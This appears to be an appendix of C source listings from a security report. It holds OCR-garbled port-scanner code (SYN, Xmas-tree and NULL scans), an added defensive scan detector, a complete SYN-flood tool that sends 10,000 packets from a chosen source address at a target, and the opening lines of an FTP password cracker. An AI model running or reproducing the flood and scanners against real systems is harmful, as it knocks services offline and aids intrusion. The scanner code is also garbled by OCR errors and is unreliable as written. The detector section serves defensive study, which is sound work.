libnet_init_packet!packet_size,  &packetRST); 
if(!adhandle=  pcap_open_live(d->name,  //  name  of  the  device 

65536,  //  portion  of  the  packet  to  capture. 

//  65536  grants  that  the  whole  packet  will  be  captured  on  all  the  MACs. 

1,  //  promiscuous  mode 

1000,  //  read  timeout 

errbuf  //  error  buffer 
) )  ==  NULL)  { 

fprintf(stderr,"\nUnable  to  open  the  adapter.  %s  is  not  supported  by  WinPcap\n"); 
pcap_freealldevs!  allde  vs) ; 
return  -1; 

} 

/*  Ethernet?  */ 

if(pcap_datalink(adhandle)  !=  DLT_EN10MB)  { 

fprintf(stderr,"\nThis  program  works  only  on  Ethernet  networks.Nn"); 
pcap_freealldevs(alldevs) ; 
return  -1; 

} 

iffd->addresses  !=  NULL) 
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/*  get  a  network  mask  for  selected  device  (first  ip -address  for  this  device)  */ 
netmask=((struct  sockaddr_in  *)(d->addresses->netmask))->sin_addr.S_un.S_addr; 


/*  else  network  class  is  C  */ 
netmask=Oxffffff ; 

printf("Selected  device:  %s\n",  d->description); 

pcap_freealldevs(alldevs); 

while  (libnet_plist_chain_next_pair(plist_p,  &bport,  &eport))  { 
while  (!(bport  >  eport)  &&  bport  !=  0)  { 
circle  =  1 ; 

eport  =  bport++;  //  current  port 

if((packet  ==  NULL)  II  (packetRST  ==  NULL))  libnet_error(LIBNET_ERR_FATAL, 
"libnet_init_packet  failed\n"); 

/*  packet  construction  (IP  header)  */ 

libnet_build_ip(LIBNET_TCP_H,  /*  size  of  the  packet  sans  IP  header  */ 


IPTOS_LOWDELAY, 

242, 

0, 

48, 

IPPROTO_TCP, 

src_ip, 

dst_ip, 

NULL, 

0, 

packet); 

libnet_build_ip(LIBNET_TCP_H, 


/*  IP  tos  */ 

/*  IP  ID  */ 

/*  frag  stuff  */ 

/*  TTL  */ 

/*  transport  protocol  */ 

/*  source  IP  */ 

/*  destination  IP  */ 

/*  payload  (none)  */ 

/*  payload  length  */ 

/*  packet  header  memory  */ 

/*  size  of  the  packet  sans  IP  header  */ 


IPTOS_LOWDELAY, 

242, 

0, 

48, 

IPPROTO_TCP, 
src_ip, 
dst_ip, 

NULL, 

0, 

packetRST); 

/*  packet  construction  (TCP  header)  */ 

/*  random  sequence  number  */ 
seq_number  =  libnet_get_prand(LIBNET_PRu32); 
ack_number  =  0; 
libnet_build_tcp(src_prt. 


/*  IP  tos  */ 

/*  IP  ID  */ 

/*  frag  stuff  */ 

/*  TTL  */ 

/*  transport  protocol  */ 

/*  source  IP  */ 

/*  destination  IP  */ 

/*  payload  (none)  */ 

/*  payload  length  */ 

/*  packet  header  memory  */ 


eport, 

seq_number, 

ack_number, 

TH_SYN, 

1024, 

0, 

NULL, 


/*  source  TCP  port  */ 

/*  destination  TCP  port  */ 

/*  sequence  number  */ 

/*  acknowledgement  number  */ 
/*  control  flags  */ 

/*  window  size  */ 

/*  urgent  pointer  */ 

/*  payload  (none)  */ 

/*  payload  length  */ 

/*  packet  header  memory  */ 


0, 

packet  +  LIBNET_IP_H); 

/*  checksum  (only  TCP  header)  */ 

if(libnet_do_checksum(packet,  IPPROTO_TCP,  LIBNET_TCP_H)  ==  -1) 
libnet_error(LIBNET_ERR_FATAL,  "libnet_do_checksum  failed\n"); 

/*  preparing  for  catch  */ 

/*  construct  a  filter  */ 

j  =  sprintf(packet_filter,  "ip  and  tep  and  sre  host  %s  and  dst  host  %s  and  sre  port  %d  and  dst  port  %d", 
destination,  source,  eport,  src_prt); 
if(pcap_compile(adhandle,  &fcode,  packet_filter,  1,  netmask)<0  ){ 

fprintf(stderr,"\nUnable  to  compile  the  packet  filter.  Check  the  syntax. \n"); 

pcap_freealldevs(alldevs); 

return  -1; 


if(pcap_setfilter(adhandle,  &fcode)<0)  { 

fprintf(stderr,"\nError  setting  the  filter.Xn”); 

pcap_freealldevs(alldevs); 

return -1; 
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} 

c  =  libnet_write_ip(network,  packet,  packet_size); 
if(c  <  packet_size)  { 

libnet_error(LN_ERR_WARNING,  "libnet_write_ip  only  wrote  %dbytes\n",  c); 

}  else  { 

printf("l.  %s.%d->%s.%d  TCP  SYN  (seq:  %x  ack:  %x)\n",  source,  src_prt,  destination, 
cport,  seq_number,  ack_number); 

} 

time(&localtime  1 ) ; 
while(circle){ 

res  =  pcap_read_ex(adhandle,  &header,  &pkt_data); 
if(res  ==  0)  { 

/*  timeout  */ 

time( &localtime2) ; 

if  ((localtime2-localtimel)>timeout)  { 

printf("port  %d  is  TIME  OUT!\n",  cport); 
break; 

} 

continue; 

}  else  { 

if  (res  >  0)  { 
circle  =  0; 

ltime=localtime(&header->ts.tv_sec); 

strftime(  timestr,  sizeof  timestr,  "%H:%M:%S",  ltime); 

iph  =  (struct  libnet_ip_hdr  *)  (pkt_data  + 

LIBNET_ETH_H) ; 
ip_len  =  (iph->ip_hi  &  Oxf)  *  4; 

tcph  =  (struct  libnet_tcp_hdr  *)  ((u_char*)iph  +  ip_len); 
seq_number_from_server  =  ntohl(tcph->th_seq); 

/*  RST  +  ACK  =  port  is  closed 
*  SYN  +  ACK  =  port  is  open  */ 
if  (tcph->th_flags  ==  (TH_RST+TH_ACK))  { 

printf("2.  %s.%d->%s.%d  TCP  RST  ACK  (seq:  %x  ack:  %x)\nPort  %d  is  seems  to 
be  CLOSED  An",  destination,  ntohs(tcph->th_sport),  source, 
ntohs(tcph->th_dport),  seq_number_from_server,  ntohl(tcph->th_ack),  cport); 

1 

if  (tcph->th_flags  ==  (TH_SYN+TH_ACK))  { 

printf("2.  %s.%d->%s.%d  TCP  SYN  ACK  (seq:  %x  ack:  %x)\nPort  %d  is  seems 
to  be  OPEN.Vn",  destination,  ntohs(tcph->th_sport),  source, 
ntohs(tcph->th_dport),  seq_number_from_server,  ntohl(tcph->th_ack),  cport); 

} 

/*  sending  RST  ACK  packet  */ 
libnet_build_tcp(src_prt,  /*  source  TCP  port  */ 

cport,  /*  destination  TCP  port  */ 

seq_number+l,  /*  sequence  number  */ 
seq_number_from_server+l,  /*  acknowledgement  number  */ 
TH_RST+TH_ACK,  /*  control  flags  */ 

1024,  /*  window  size  */ 

0,  /*  urgent  pointer  */ 

NULL,  /*  payload  (none)  */ 

0,  /*  payload  length  */ 

packetRST  +  LIBNET_IP_H);  /*  packet  header  memory  */ 

/*  checksum  (TCP  header  only)  */ 

if(libnet_do_checksum(packetRST,  IPPROTO_TCP,  LIBNET_TCP_H)  ==  -1) 
libnet_error(LIBNET_ERR_FATAL,  "libnet_do_checksum  failed\n"); 
c  =  libnet_write_ip(network,  packetRST,  packet_size); 
if(c  <  packet_size)  { 

libnet_error(LN_ERR_WARNING,  "libnet_write_ip  only  wrote  %d  bytes\n",  c); 

}  else  ( 

printf("3.  %s.%d->%s.%d  TCP  RST  ACK  (seq:  %x  ack:  %x)\n\n",  source,  src_prt, 
destination,  cport,  seq_number+ 1 ,  seq_number_from_server+l); 


}  else  { 

printf("Error  reading  the  packets:  %s\n",  pcap_geterr(adhandle)); 
return  -1; 

) 
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} 


I 

} 

if(libnet_close_raw_sock(network)  ==  -1)  { 

libnet_error(LN_ERR_WARNING,  "libnet_close_raw_sock  couldn't  close  the  interface"); 

} 

libnet_destroy_packet(&packet); 
libnet_destroy_packet(&packetRST); 
break; 
case  'X': 

printf(" Starting  scanports  v.l.0\n"); 

printf("TCP  scanning  by  using  X-mas  tree  method.\n\n"); 

/*  TCP  FIN  packet  with  URG  PUSH  */ 
packet_size  =  LIBNET„IP_H  +  LIBNET_TCP_H; 
network  =  libnet_open_raw_sock(IPPROTO_RAW); 

iffnetwork  ==  -1)  libnet_error(LIBNET_ERR_FATAL,  "Can't  open  network.Vn"); 

libnet_init_packet(packet_size,  &packet); 

if((adhandle=  pcap_open_live(d->name,  //  name  of  the  device 

65536,  //  portion  of  the  packet  to  capture. 

//  65536  grants  that  the  whole  packet  will  be  captured  on  all  the  MACs. 
1,  //  promiscuous  mode 

1000,  //  read  timeout 

errbuf  //  error  buffer 

) )  ==  NULL)  { 

fprintf(stderr,"\nUnable  to  open  the  adapter.  %s  is  not  supported  by  WinPcap\n"); 

pcap_freealldevs(alldevs); 

return  -1; 

} 

/*  Ethernet?  */ 

if(pcap_datalink(adhandle)  !=  DLT_EN10MB)  { 

fprintf(stderr,"\nThis  program  works  only  on  Ethernet  networks.\n"); 

pcap_freealldevs(alldevs); 

return  -1; 


if(d->addresses  !=NULL) 

netmask=((struct  sockaddr_in  *)(d->addresses->netmask))->sin_addr.S_un.S_addr; 

else 

netmask=0xffffff ; 

printf("Selected  device:  %s\n",  d->description); 
pcap_freealldevs(alldevs); 


while  (libnet_plist_chain_next_pair(plist_p,  &bport,  &eport))  { 
while  (!(bport  >  eport)  &&  bport  !=  0)  { 
circle  =  1 ; 
eport  =  bport ++; 

if((packet  ==  NULL)  II  (packetRST  ==  NULL))  libnet_error(LIBNET_ERR_FATAL, 
"libnet_init_packet  failed\n"); 

/*  packet  construction  (IP  header)  */ 

libnet_build_ip(LIBNET_TCP_H,  /*  size  of  the  packet  sans  IP  header  */ 


IPTOS_LOWDELAY 
242, 

0, 

48, 

IPPROTO_TCP, 
src_ip, 
dst_ip, 

NULL, 

0, 

packet); 

/*  packet  construction  (TCP  header)  */ 
seq_number  =  libnet_get_prand(LIBNET_PRu32); 
ack_number  =  0; 


/*  IP  tos  */ 

/*  IP  ID  */ 

/*  frag  stuff  */ 

/*  TTL  */ 

/*  transport  protocol  */ 

/*  source  IP  */ 

/*  destination  IP  */ 

/*  payload  (none)  */ 

/*  payload  length  */ 

/*  packet  header  memory  */ 


libnet_build_tcp(src_prt, 

eport, 

seq_number. 


/*  source  TCP  port  */ 

/*  destination  TCP  port  */ 
/*  sequence  number  */ 
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ack_number,  /*  acknowledgement  number  */ 

TH_FIN +TH_URG+TH_PU SH,  /*  control  flags  */ 

1024,  /*  window  size  */ 

0,  /*  urgent  pointer  */ 

NULL,  /*  payload  (none)  */ 

0,  /*  payload  length  */ 

packet  +  LIBNET_IP_H);  /*  packet  header  memory  */ 

/*  checksum  (TCP  header  only)  */ 

if(libnet_do_checksum(packet,  IPPROTO_TCP,  LIBNET_TCP_H)  ==  -1) 
libnet_error(LIBNET_ERR_FATAL,  "libnet_do_checksum  failed\n"); 
j  =  sprintf(packet_filter,  "ip  and  tcp  and  src  host  %s  and  dst  host  %s  and  src  port  %d  and  dst  port  %d", 
destination,  source,  cport,  src_prt); 
if(pcap_compile(adhandle,  &fcode,  packet_filter,  1,  netmask)<0  ){ 

fprintf(stderr,"\nUnable  to  compile  the  packet  filter.  Check  the  syntax. \n"); 
pcap_freeallde  vs(allde  vs) ; 
return  -1; 

} 

if(pcap_setfilter( adhandle,  &fcode)<0)  { 

fprintf(stderr,"\nError  setting  the  filter.Xn"); 

pcap_freealldevs(alldevs); 

return  -1; 

} 

c  =  iibnet_write_ip(network,  packet,  packet_size); 
if(c  <  packet_size)  { 

libnet_error(LN_ERR_WARNING,  "libnet_write_ip  only  wrote  %d  bytes\n",  c); 

}  else  { 

printf("l.  %s.%d->%s.%d  TCP  FIN  PUSH  URG  (seq:  %x  ack:  %x)\n",  source,  src_prt, 
destination,  cport,  seq_number,  ack_number); 

} 

time(&localtime  1 ) ; 
while(circle){ 

res  =  pcap_read_ex(adhandle,  &header,  &pkt_data); 
iffres  ==  0)  { 

time( &localtime2) ; 
if  ((localtime2-localtimel)>timeout)  ( 

printf("port  %d  is  TIME  OUT!\n",  cport); 
break; 


continue; 

}  else  { 

if  (res  >  0)  { 
circle  =  0; 

ltime=localtime(&header->ts.tv_sec); 

strftimef  timestr,  sizeof  timestr,  ltime); 

iph  =  (struct  libnet_ip_hdr  *)  (pkt_data  + 

LIBNET_ETH_H) ; 
ip_len  =  (iph->ip_hl  &  Oxf)  *  4; 

tcph  =  (struct  libnet_tcp_hdr  *)  ((u_char*)iph  +  ip_len); 
seq_number_from_server  =  ntohl(tcph->th_seq); 
if  (tcph->th_flags  ==  (TH_RST+TH_ACK))  { 

printf("2.  %s.%d->%s.%d  TCP  RST  ACK  (seq:  %x  ack:  %x)  \nPort  %d  is  seems  to 
be  CLOSED.\n\n",  destination,  ntohs(tcph->th_sport),  source, 
ntohs(tcph->th_dport),  seq_number_from_server,  ntohl(tcph->th_ack),  cport); 

} 

}  else  { 

printf("Error  reading  the  packets:  %s\n",  pcap_geterr( adhandle)); 
return  -1; 


} 


} 


) 


if(libnet_close_raw_sock(network)  ==  -1)  { 

libnet_error(LN_ERR_WARNING,  "libnet_close_raw_sock  couldn't  close  the  interface"); 

} 

libnet_destroy_packet(&packet); 
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break; 
case  'N': 

printf(" Starting  scanports  v.l.0\n"); 
printfC'TCP  null-scanning.\n\n"); 

/*  construction  of  TCP-header  (all  flags  are  switched  off)  */ 

/*  packet  size:  no  data,  only  TCP  and  IP  headers  */ 
packet_size  =  LIBNET_IP_H  +  LIBNET_TCP_H; 
network  =  libnet_open_raw_sock(IPPROTO_RAW); 

if(network  ==  -1)  libnet_error(LIBNET_ERR_FATAL,  "Can't  open  network.Vn"); 

libnet_init_packet(packet_size,  &packet); 

if((adhandle=  pcap_open_live(d->name,  //  name  of  the  device 

65536,  //  portion  of  the  packet  to  capture. 

//  65536  grants  that  the  whole  packet  will  be  captured  on  all  the  MACs. 
1,  //  promiscuous  mode 

1000,  //  read  timeout 

errbuf  //  error  buffer 
) )  ==  NULL)  { 

fprintf(stderr,"\nUnable  to  open  the  adapter.  %s  is  not  supported  by  WinPcap\n"); 

pcap_freealldevs(alldevs); 

return  -1; 

} 

/*  Ethernet?  */ 

if(pcap_datalink(adhandle)  !=  DLT_EN10MB)  { 

fprintf(stderr,"\nThis  program  works  only  on  Ethernet  networks.\n"); 

pcap_freealldevs(alldevs); 

return  -1; 

} 

if(d->addresses  !=NULL) 

/*  get  a  network  mask  for  selected  device  (first  ip -address  for  this  device)  */ 
netmask=((struct  sockaddr_in  *)(d->addresses->netmask))->sin_addr.S_un.S_addr; 

else 

/*  else  network  class  is  C  */ 
netmask=Oxffffff ; 

printf("Selected  device:  %s\n",  d->description); 

/*  remove  adapters  list  */ 
pcap_freealldevs(alldevs); 

/*  circle  for  intervals  of  ports  */ 

while  (libnet_plist_chain_next_pair(plist_p,  &bport,  &eport))  { 
while  (!(bport  >  eport)  &&  bport  !=  0)  { 
circle  =  1 ; 

eport  =  bport++;  //  current  port 

if( (packet  ==  NULL)  II  (packetRST  ==  NULL))  libnet_error(LIBNET_ERR_FATAL, 
"libnet_init_packet  failed\n" ) ; 

/*  packet  construction  (IP  header)  */ 

libnet_build_ip(LIBNET_TCP_H,  /*  size  of  the  packet  sans  IP  header  */ 
IPTOS_LOWDELAY,  /*  IP  tos  */ 

242,  /*  IP  ID  */ 

0,  /*  frag  stuff  */ 

48,  /*  TTL  */ 

IPPROTO_TCP,  /*  transport  protocol  */ 
src_ip,  /*  source  IP  */ 

dst_ip,  /*  destination  IP  */ 

NULL,  /*  payload  (none)  */ 

0,  /*  payload  length  */ 

packet);  /*  packet  header  memory  */ 

/*  packet  construction  (TCP  header)  */ 

/*  random  sequence  number  */ 

seq_number  =  libnet_get_prand(LIBNET_PRu32); 

ack_number  =  0; 

libnet_build_tcp(src_prt,  /*  source  TCP  port  */ 

eport,  /*  destination  TCP  port  */ 

seq_number,  /*  sequence  number  */ 

ack_number,  /*  acknowledgement  number  */ 

0,  /*  control  flags  */ 

1024,  /*  window  size  */ 
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0,  /*  urgent  pointer  */ 

NULL,  /*  payload  (none)  */ 

0,  /*  payload  length  */ 

packet  +  LIBNET_IP_H);  /*  packet  header  memory  */ 

/*  checksum  (TCP  header)  */ 

if(libnet_do_checksum(packet,  IPPROTO_TCP,  LIBNET_TCP_H)  ==  -1) 
libnet_error(LIBNET_ERR_F ATAL,  "libnet_do_checksum  failed\n " ) ; 

/*  preparing  for  catch  */ 

/*  construct  a  filter  */ 

j  =  sprintf(packet_filter,  "ip  and  tcp  and  src  host  %s  and  dst  host  %s  and  src  port  %d  and  dst  port 
%d",  destination,  source,  cport,  src_prt); 

/*  compile  a  filter  */ 

if(pcap_compile(adhandle,  &fcode,  packet_filter,  1,  netmask)<0  ){ 

fprintf(stderr,"\nUnable  to  compile  the  packet  filter.  Check  the  syntax. \n"); 

/*  remove  adapters  list  */ 
pcap_freealldevs(alldevs); 
return  -1; 

} 

/*  set  a  filter  */ 

if(pcap_setfilter(adhandle,  &fcode)<0){ 

fprintf(stderr,"\nError  setting  the  filter.Xn"); 

/*  remove  adapters  list  */ 
pcap_freealldevs(alldevs); 
return  -1; 

} 

/*  sending  packet  */ 

c  =  iibnet_write_ip(network,  packet,  packet_size); 
if(c  <  packet_size)  { 

libnet_error(LN_ERR_WARNING,  "libnet_write_ip  only  wrote  %d  bytes\n",  c); 

}  else  { 

printf("l.  %s.%d->%s.%d  TCP  FIN  PUSH  URG  (seq:  %x  ack:  %x)\n",  source,  src_prt, 
destination,  cport,  seq_number,  ack_number); 

I 

/*  catch  a  packet  */ 

/*  remember  current  time  */ 
time(&localtime  1 ) ; 
while(circle){ 

res  =  pcap_read_ex(adhandle,  &header,  &pkt_data); 
if(res  ==  0)  { 

/*  timeout  */ 

time( &localtime2) ; 

if  ((localtime2-localtimel)>timeout)  ( 

printf("port  %d  is  TIME  OUT!\n",  cport); 
break; 

} 

continue; 

}  else  { 

if  (res  >  0)  { 
circle  =  0; 

/*  working  with  received  packet  */ 

/*  convert  timestamp  in  readable  format  */ 

ltime=localtime(&header->ts.tv_sec); 

strftime(  timestr,  sizeof  timestr,  ltime); 

/*  finding  a  start  point  of  IP  header  */ 
iph  =  (struct  libnet_ip_hdr  *)  (pkt_data  + 

LIBNET_ETH_H);  //  Ethernet  header  length 
/*  find  a  start  point  of  TCP  header  */ 
ip_len  =  (iph->ip_hl  &  Oxf)  *  4; 

tcph  =  (struct  libnet_tcp_hdr  *)  ((u_char*)iph  +  ip_len); 
seq_number_from_server  =  ntohl(tcph->th_seq); 

/*  RST  +  ACK  =  port  is  closed 
*  ack  number  <>  seq  number  —  not  our  packet!  */ 
if  (tcph->th_flags  ==  (TH_RST+TH_ACK))  { 

printf("2.  %s.%d->%s.%d  TCP  RST  ACK  (seq:  %x  ack:  %x)  \nPort  %d  is  seems  to 
be  CLOSED.\n\n",  destination,  ntohs(tcph->th_sport),  source, 
ntohs(tcph->th_dport),  seq_number_from_server,  ntohl(tcph->th_ack),  cport); 
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} 

}  else  { 

printf("Error  reading  the  packets:  %s\n",  pcap_geterr(adhandle)); 
return  -1; 


}  //  end  of  circle  by  ports  in  current  pair 
}  //  end  of  circle  by  pairs  of  ports 
/*  close  a  network  interface  */ 
if(libnet_close_raw_sock(network)  ==  -1)  { 

libnet_error(LN_ERR_WARNING,  "libnet_close_raw_sock  couldn't  close  the  interface"); 

} 

libnet_destroy_packet(&packet); 

break; 

default: 

usage(); 

break; 


return  0; 

} 

void  usage()  { 
printf("\n"); 

printf("scanports  v.l.0\n"); 
printf("scanports  [scan  type]  <arguments>\n"); 
printf("where  [scan  type]  is  one  of  the  following: \n"); 
printf("-sS  —  TCP  SYN  scan  (half  TCP-connection)\n"); 
printf("-sT  —  TCP  connect  scan\n"); 
printf("-sU  —  UDP  scan  (not  realized  yet)\n"); 
printf("-sF  -  TCP  FIN  scan\n"); 
printf("-sX  —  TCP  Xmax  Tree  scan\n"); 
printf("-sN  -  TCP  NULL  scan\n"); 
printf ( "  <arguments>\n " ) ; 

printf("<-i  number>  —  number  of  network  interface  (use  'Windump  -D'  for  listing  of  installed  interfaces)\n"); 

printf("<-h  ip.ip.ip.ip.port>  —  source  host\n"); 

printf("<-d  ip.ip.ip.ip>  —  destination  host\n"); 

printf("<-p  \"ports\">,  for  example  -p  \"  10,20- 100, 101  l\"\n"); 

printf("<-t  number>  —  timeout  for  waiting  of  reply  (in  seconds)\n"); 

exit(0); 

} 
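The flag words scanports.c puts on the wire (SYN alone for -sS, FIN+URG+PUSH for -sX, an empty flag byte for -sN, and the RST+ACK it sends instead of completing the handshake) are exactly what a sensor on the target network can key on. The following detector is an added example written for this page, not code from the report's authors: it classifies captured segments by those flag words and flags any source that probes several distinct ports without ever sending the bare ACK that finishes a connection. The addresses, ports and packet records are constructed sample data, and the TH_* values mirror libnet's constants.

```c
#include <stdio.h>
#include <string.h>

/* TCP flag bits, the same values as the TH_* constants scanports.c takes from libnet */
enum { TH_FIN = 0x01, TH_SYN = 0x02, TH_RST = 0x04, TH_PUSH = 0x08, TH_ACK = 0x10, TH_URG = 0x20 };
enum probe_kind { PROBE_NONE = 0, PROBE_SYN, PROBE_XMAS, PROBE_NULL, PROBE_KINDS };

/* Classify one inbound segment by the exact flag word the scanner builds:
 * -sS sends SYN alone, -sX sends FIN+URG+PUSH, -sN sends no flags at all.
 * Anything else (SYN+ACK, ACK, PUSH+ACK, RST+ACK, ...) is not one of its probes. */
enum probe_kind classify_probe(unsigned char flags)
{
    if (flags == TH_SYN)                      return PROBE_SYN;
    if (flags == (TH_FIN | TH_URG | TH_PUSH)) return PROBE_XMAS;
    if (flags == 0)                           return PROBE_NULL;
    return PROBE_NONE;
}

/* One record of a capture summary: source address, destination port, TCP flags */
struct seg { const char *src; unsigned short dport; unsigned char flags; };

enum { MAX_SRC = 16, MAX_PORTS = 64 };
struct src_stat {
    const char *src;
    int probes[PROBE_KINDS];         /* probe segments seen, per kind */
    int acks;                        /* bare ACKs: a real client completing the handshake */
    unsigned short ports[MAX_PORTS]; /* distinct destination ports probed */
    int nports;
};

static struct src_stat *stat_for(struct src_stat *tab, int *ntab, const char *src)
{
    int i;
    for (i = 0; i < *ntab; i++)
        if (strcmp(tab[i].src, src) == 0) return &tab[i];
    if (*ntab >= MAX_SRC) return NULL;   /* table full: drop the record rather than overflow */
    memset(&tab[*ntab], 0, sizeof tab[*ntab]);
    tab[*ntab].src = src;
    return &tab[(*ntab)++];
}

static void note_port(struct src_stat *st, unsigned short dport)
{
    int i;
    for (i = 0; i < st->nports; i++)
        if (st->ports[i] == dport) return;
    if (st->nports < MAX_PORTS) st->ports[st->nports++] = dport;
}

/* Aggregate per source; return how many sources probed at least port_threshold
 * distinct ports without ever sending the bare ACK that completes a handshake
 * (scanports answers a SYN+ACK with RST+ACK, so a scanning host never sends it). */
int detect_port_sweeps(const struct seg *segs, int nsegs, int port_threshold,
                       struct src_stat *tab, int *ntab)
{
    int i, flagged = 0;
    *ntab = 0;
    for (i = 0; i < nsegs; i++) {
        struct src_stat *st = stat_for(tab, ntab, segs[i].src);
        enum probe_kind k;
        if (st == NULL) continue;
        if (segs[i].flags == TH_ACK) { st->acks++; continue; }
        k = classify_probe(segs[i].flags);
        if (k == PROBE_NONE) continue;
        st->probes[k]++;
        note_port(st, segs[i].dport);
    }
    for (i = 0; i < *ntab; i++)
        if (tab[i].nports >= port_threshold && tab[i].acks == 0) flagged++;
    return flagged;
}

/* Constructed sample, not captured traffic: 10.0.0.5 behaves like "scanports -sS"
 * plus one null probe, 10.0.0.7 is an ordinary client opening one connection. */
static const struct seg SAMPLE[] = {
    { "10.0.0.5", 21, TH_SYN },
    { "10.0.0.5", 22, TH_SYN },
    { "10.0.0.5", 22, TH_RST | TH_ACK },  /* scanner's step 3: tear down the half-open connection */
    { "10.0.0.5", 25, TH_SYN },
    { "10.0.0.5", 80, TH_SYN },
    { "10.0.0.5", 81, 0 },                /* -sN style probe: no flags */
    { "10.0.0.7", 80, TH_SYN },
    { "10.0.0.7", 80, TH_ACK },           /* handshake completed: a real connection */
};
#define SAMPLE_LEN ((int)(sizeof SAMPLE / sizeof SAMPLE[0]))

struct src_stat g_tab[MAX_SRC]; int g_ntab;

/* Run the detector over the sample with a threshold of 4 distinct ports */
int run_sample(void)
{
    return detect_port_sweeps(SAMPLE, SAMPLE_LEN, 4, g_tab, &g_ntab);
}

int main(void)
{
    int i, hits = run_sample();
    for (i = 0; i < g_ntab; i++)
        printf("%s: %d distinct ports, SYN=%d XMAS=%d NULL=%d, ACK=%d\n", g_tab[i].src, g_tab[i].nports,
               g_tab[i].probes[PROBE_SYN], g_tab[i].probes[PROBE_XMAS], g_tab[i].probes[PROBE_NULL], g_tab[i].acks);
    printf("sources flagged as port sweeps: %d\n", hits);
    return 0;
}
```

The same aggregation also separates a TCP connect scan (-sT) from real clients only by port fan-out, since a connect scan does complete handshakes; the acks check is what isolates the half-open and stealth variants.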


A3.2. Source code of program synflood.c

/* using winpcap library version 3.0 alpha 4 */
#include <pcap.h>

/* using libnetnt library version 1.0.2f */
#include <libnet.h>

#include "getopt.h"
#include <string.h>

/* number of packets to send */
#define NUMBER_OF_PACKETS 10000
#define START_SOURCE_PORT 1025

/* prototypes of functions */
void usage();

int main(int argc, char **argv) {
    int inum = 0;                           /* counter */
    int i = 0;                              /* counter */
    int n = 0;                              /* counter */
    int network;                            /* identification of network device */
    int packet_size;                        /* size of our packet */
    int res = 0;                            /* result of some functions */
    u_long seq_number;                      /* sequence number */
    u_long ack_number;                      /* acknowledgement number */
    char *source;                           /* source ip address */
    char *destination;                      /* destination ip address */
    u_long src_ip = 0, dst_ip = 0;          /* source and destination ip-addresses in network format */
    u_short dst_prt;                        /* destination port */
    u_short cport = START_SOURCE_PORT;      /* current source port */
    int c;                                  /* option letter, later the number of bytes written */
    char *cp;                               /* for address resolution */

    /* arena */
    struct libnet_arena arena, *arena_p;
    u_char *packets[NUMBER_OF_PACKETS];

    /* get a parameters */
    while((c = getopt(argc, argv, "d:s:")) != EOF) {
        switch (c) {
        case 's':
            /* source ip address */
            /* TO_DO verify user input */
            source = optarg;
            if((src_ip = libnet_name_resolve(optarg, 1)) == -1)
                libnet_error(LIBNET_ERR_FATAL, "Bad source IP address: %s\n", optarg);
            break;
        case 'd':
            /* destination ip address */
            /* TO_DO verify user input */
            /* we are expected 'ip.ip.ip.ip.port' */
            if (!(cp = strrchr(optarg, '.'))) {
                usage();
            }
            *cp++ = 0;
            dst_prt = (u_short)atoi(cp);
            destination = optarg;
            if (!(dst_ip = libnet_name_resolve(optarg, LIBNET_RESOLVE)))
                libnet_error(LIBNET_ERR_FATAL, "Bad destination IP address: %s\n", optarg);
            break;
        }
    }

    /* parameters are incorrect */
    if(!src_ip || !dst_ip) usage();

    /* initialize random function */
    if (libnet_seed_prand() == -1)
        libnet_error(LIBNET_ERR_FATAL, "libnet_seed_prand failed\n");

    /* identification of program :) */
    printf("SYN flooding v.1.0\n");

    /* TCP SYN packet construction */
    /* size of our packet: no data, only IP and TCP headers */
    packet_size = LIBNET_IP_H + LIBNET_TCP_H;

    /* number of packets in arena = NUMBER_OF_PACKETS */
    arena_p = &arena;
    if(libnet_init_packet_arena(&arena_p, NUMBER_OF_PACKETS, packet_size) == -1) {
        printf("libnet_init_packet_arena failed\n");
    } else {
        printf("Allocated an arena of %ld bytes.\n", LIBNET_GET_ARENA_SIZE(arena));
    }

    /* initialization of network interface */
    network = libnet_open_raw_sock(IPPROTO_RAW);
    if(network == -1) libnet_error(LIBNET_ERR_FATAL, "Can't open network.\n");

    for(n = 0; n < NUMBER_OF_PACKETS; n++, cport++) {
        printf("%ld bytes remaining in arena\n", LIBNET_GET_ARENA_REMAINING_BYTES(arena));
        packets[n] = libnet_next_packet_from_arena(&arena_p, packet_size);
        if (!packets[n]) {
            libnet_error(LIBNET_ERR_WARNING, "Arena is empty\n");
            continue;
        }

        /* IP header construction */
        libnet_build_ip(LIBNET_TCP_H,   /* size of the packet sans IP header */
                        IPTOS_LOWDELAY, /* IP tos */
                        242,            /* IP ID */
                        0,              /* frag stuff */
                        48,             /* TTL */
                        IPPROTO_TCP,    /* transport protocol */
                        src_ip,         /* source IP */
                        dst_ip,         /* destination IP */
                        NULL,           /* payload (none) */
                        0,              /* payload length */
                        packets[n]);    /* packet header memory */

        /* TCP header construction */
        /* get a random sequence number */
        seq_number = libnet_get_prand(LIBNET_PRu32);
        ack_number = 0;
        libnet_build_tcp(cport,         /* source TCP port */
                         dst_prt,       /* destination TCP port */
                         seq_number,    /* sequence number */
                         ack_number,    /* acknowledgement number */
                         TH_SYN,        /* control flags */
                         1024,          /* window size */
                         0,             /* urgent pointer */
                         NULL,          /* payload (none) */
                         0,             /* payload length */
                         packets[n] + LIBNET_IP_H); /* packet header memory */

        /* checksum for TCP header */
        if(libnet_do_checksum(packets[n], IPPROTO_TCP, LIBNET_TCP_H) == -1)
            libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n");

        /* injection of packet */
        c = libnet_write_ip(network, packets[n], packet_size);
        if(c < packet_size) {
            libnet_error(LN_ERR_WARNING, "libnet_write_ip only wrote %d bytes\n", c);
        } else {
            printf("packet %d of %d, wrote all %d bytes\n", n + 1, NUMBER_OF_PACKETS, c);
        }
    }

    libnet_destroy_packet_arena(&arena_p);
    if(libnet_close_raw_sock(network) == -1) {
        libnet_error(LN_ERR_WARNING, "libnet_close_raw_sock couldn't close the interface");
    }

    return 0;
}

void usage() {
    printf("\n");
    printf("SYN flooding v.1.0\n");
    printf("SYNflood <arguments>\n");
    printf(" where <arguments>:\n");
    printf("<-s ip.ip.ip.ip> - source host\n");
    printf("<-d ip.ip.ip.ip.port> - destination host\n");
    exit(0);
}

A3.3. Source code of program ftpcrack.c

/* using libnetnt library version 1.0.2f */
#include <libnet.h>

#include "getopt.h"
#include <string.h>
#include <stdio.h>

#define BUFFER_SIZE 1024

/* prototypes of functions */
void usage();
int getFTPcode(LPSTR reply, int nBufLen);
int sendFTPcommand(SOCKET s, LPSTR command, int length);

int main(int argc, char **argv) {
    char reply[BUFFER_SIZE];                /* reply from server */
    char message[BUFFER_SIZE];              /* message to server */
    int nTotalBytes = 0;
    int nNewBytes = 1;
    char *cp;
    char *destination;                      /* destination ip-address */
    u_long dst_ip = 0;                      /* destination ip-address in network format */
